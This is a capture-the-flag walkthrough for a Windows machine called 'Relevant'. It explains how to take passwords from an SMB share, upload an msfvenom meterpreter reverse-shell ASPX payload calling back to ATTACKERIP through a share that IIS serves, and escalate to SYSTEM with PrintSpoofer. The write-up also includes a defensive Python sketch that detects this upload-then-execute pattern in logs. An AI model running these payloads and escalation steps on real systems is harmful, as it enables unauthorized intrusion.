Relevant

Tasks:

  1. Pre-Engagement Briefing:

    1. Do the usual nmap scan with service detection: SMB is running on 445, and an IIS server on 80 and 49663.
    2. Connect to SMB and enumerate the shares. The nt4wrksv share looks unusual and contains passwords.txt; grab it. The passwords are base64 encoded, so decode them and keep them for later use.
    3. Run gobuster for directories on ports 80 and 49664 with the directory-list-2.3-medium.txt wordlist. You will find an nt4wrksv directory on 49664; open http://ip:49664/nt4wrksv/passwords.txt in a browser and you see the same file as in the SMB share. This directory is serving files straight from the SMB share.
    4. Create an msfvenom payload with msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=ATTACKERIP lport=1234 -f aspx -o shell.aspx and upload it to the SMB share. Start a meterpreter listener: use exploit/multi/handler, set payload windows/x64/meterpreter_reverse_tcp, configure LHOST and LPORT, and run it. Then open http://ip:49664/nt4wrksv/shell.aspx in the browser. You now have a shell!
    5. Type shell in meterpreter to get cmd. Go to bob's Desktop and type user.txt, then submit the user flag.
    6. Type whoami /priv: SeImpersonatePrivilege is enabled!
    7. Use systeminfo to get the Windows version and details. The traditional Juicy Potato won't work here, so we need to use something called PrintSpoofer (or a direct binary link). Upload PrintSpoofer.exe to the SMB share, go back to the Windows shell in meterpreter, cd C:\inetpub\wwwroot\nt4wrksv, and run PrintSpoofer -i -c "cmd" to get a root shell.
    8. Go to the Administrator's Desktop and type root.txt to get the root flag and submit it.
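The misconfiguration behind steps 3 and 4, an SMB share whose folder sits under the IIS web root so that anything written to the share becomes a web-executable page, is what a defender would want to catch. Below is an added detection sketch, not part of the original notes: it maps shares to web roots and correlates a script-file write over SMB with a later IIS request for the same path. All share names, paths and log records are constructed samples; the share-name form follows what Security event 5145 reports, and the log layout follows IIS W3C fields.

```python
from datetime import datetime, timedelta
from pathlib import PurePosixPath, PureWindowsPath
# Constructed sample data, not real logs. Share writes as Security event 5145 reports
# them: (timestamp, share name, relative target written).
SHARE_WRITES = [
    ("2021-01-01 10:00:00", r"\\*\nt4wrksv", "passwords.txt"),
    ("2021-01-01 10:05:00", r"\\*\nt4wrksv", "shell.aspx"),
]
SHARE_PATHS = {r"\\*\nt4wrksv": r"C:\inetpub\wwwroot\nt4wrksv"}  # share -> local folder
WEB_ROOTS = {"Default Web Site": r"C:\inetpub\wwwroot"}          # IIS site -> physical root
# Constructed IIS log lines, W3C fields: date time cs-method cs-uri-stem sc-status
IIS_LOG = """\
2021-01-01 10:01:00 GET /nt4wrksv/passwords.txt 200
2021-01-01 10:06:00 GET /nt4wrksv/shell.aspx 200
2021-01-01 10:07:00 GET /index.html 200
"""
# Extensions IIS hands to a script engine instead of serving as static content.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".cshtml"}

def shares_under_web_roots(share_paths, web_roots):
    """Map each share whose folder sits inside a web root to its URL prefix."""
    exposed = {}
    for share, local in share_paths.items():
        for root in web_roots.values():
            try:
                rel = PureWindowsPath(local).relative_to(PureWindowsPath(root))
            except ValueError:
                continue  # share lives outside this site's root
            exposed[share] = "/" + rel.as_posix()
    return exposed

def uploaded_then_executed(share_writes, share_paths, web_roots, iis_log, window=timedelta(hours=1)):
    """Return (url, write_time, request_time) for script files written over SMB into a
    web-exposed share and then requested through IIS within `window`."""
    exposed = shares_under_web_roots(share_paths, web_roots)
    fmt = "%Y-%m-%d %H:%M:%S"
    written = {}  # web URL -> time the file was written through the share
    for ts, share, rel in share_writes:
        if share in exposed:
            url = f"{exposed[share]}/{PureWindowsPath(rel).as_posix()}".lower()
            written[url] = datetime.strptime(ts, fmt)
    hits = []
    for line in iis_log.splitlines():
        date, time, _method, uri, _status = line.split()[:5]
        url = uri.lower()
        if PurePosixPath(url).suffix in EXECUTABLE_EXT and url in written:
            t = datetime.strptime(f"{date} {time}", fmt)
            if timedelta(0) <= t - written[url] <= window:
                hits.append((url, written[url], t))
    return hits
```

On a real host the same check would take share-to-folder mappings from share enumeration and site roots from the IIS configuration; the static passwords.txt fetch is ignored on purpose because it is never executed.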

References:

  1. https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/
